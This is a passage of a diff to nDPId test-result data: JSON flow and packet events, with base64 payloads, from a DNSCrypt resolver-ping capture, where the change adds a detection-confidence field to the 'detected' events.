AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":411,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739337184,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":44496,"dst_port":465,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":411,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739337184,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":44496,"dst_port":465,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":412,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739337184,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":58104,"dst_port":465,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":412,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":171,"flow_packet_id":1,"flow_last_seen":946739337184,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739337184,"pkt":"REREREREZmZmZmZmCABFAAXcw6sgAL0RoycKAAABBb2qxOL4AdEGBCbssn4BAAABAAAAAAABATINZG5zY3J5cHQtY2VydARuczE2AmRlA2RucwdvcGVubmljBGdsdWUAABAAAQAAAAAAAAAAAAW3AAwFswAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":412,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739337184,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":58104,"dst_port":465,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":412,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739337184,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":58104,"dst_port":465,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00428{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":413,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739337184,"pkt":"REREREREZmZmZmZmCABFAABQw6sAub0Rx\/oKAAABBb2qxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":413,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":414,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739337184,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":40748,"dst_port":465,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":414,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":172,"flow_packet_id":1,"flow_last_seen":946739337184,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739337184,"pkt":"REREREREZmZmZmZmCABFAAIcw6xAAL0RhuYKAAABBb2qxJ8sAdECCHNXsoEBAAABAAAAAAABATINZG5zY3J5cHQtY2VydARuczE2AmRlA2RucwdvcGVubmljBGdsdWUAABAAAQAAAAAAAAAAAAG7AAwBtwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":414,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739337184,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":40748,"dst_port":465,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":414,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739337184,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":40748,"dst_port":465,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":415,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739337184,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":58650,"dst_port":465,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":415,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":173,"flow_packet_id":1,"flow_last_seen":946739337184,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739337184,"pkt":"REREREREZmZmZmZmCABFAAXcw60gAL0RoyUKAAABBb2qxOUaAdEGBCTIsoABAAABAAAAAAABATINZG5zY3J5cHQtY2VydARuczE2AmRlA2RucwdvcGVubmljBGdsdWUAABAAAQAAAAAAAAAAAAW3AAwFswAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":415,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739337184,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":58650,"dst_port":465,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":415,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739337184,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":58650,"dst_port":465,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":416,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739337184,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":59749,"dst_port":465,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":416,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":1,"flow_last_seen":946739337184,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739337184,"pkt":"REREREREZmZmZmZmCABFAAXcw64gAL0RoyQKAAABBb2qxOllAdEGBCB7soIBAAABAAAAAAABATINZG5zY3J5cHQtY2VydARuczE2AmRlA2RucwdvcGVubmljBGdsdWUAABAAAQAAAAAAAAAAAAW3AAwFswAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":416,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739337184,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":59749,"dst_port":465,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":416,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739337184,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":59749,"dst_port":465,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00428{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":417,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739337184,"pkt":"REREREREZmZmZmZmCABFAABQw60Aub0Rx\/gKAAABBb2qxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":417,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00428{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":418,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739337184,"pkt":"REREREREZmZmZmZmCABFAABQw64Aub0Rx\/cKAAABBb2qxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
@@ -866,26 +866,26 @@
 00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":424,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":172,"flow_packet_id":2,"flow_last_seen":946739337218,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":237,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":237,"pkt_l4_len":203,"ts_msec":946739337218,"pkt":"ZmZmZmZmRERERERECABFAADfmrpAADkRNRYFvarECgAAAQHRnywAy9B0soGAAAABAAEAAAAAATINZG5zY3J5cHQtY2VydARuczE2AmRlA2RucwdvcGVubmljBGdsdWUAABAAAcAMABAAAQAADhAAfXxETlNDAAEAAECBm+\/xTzDeD4KSjeZIgKwk3d3hDoaJSO\/h1pwRZePAj9XQLJ\/4Aa45W8vDBSKrJViJIaMolD7iTZBWDGXuFATTYhzIUZpFJ+MsooNEpkdNSme+M97PW3cWzIMHmxZ+fdNiHMhRmkUnX1O28V9TqKVfU9NN"}
 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":425,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348756,"flow_last_seen":946739348756,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739348756,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":38709,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
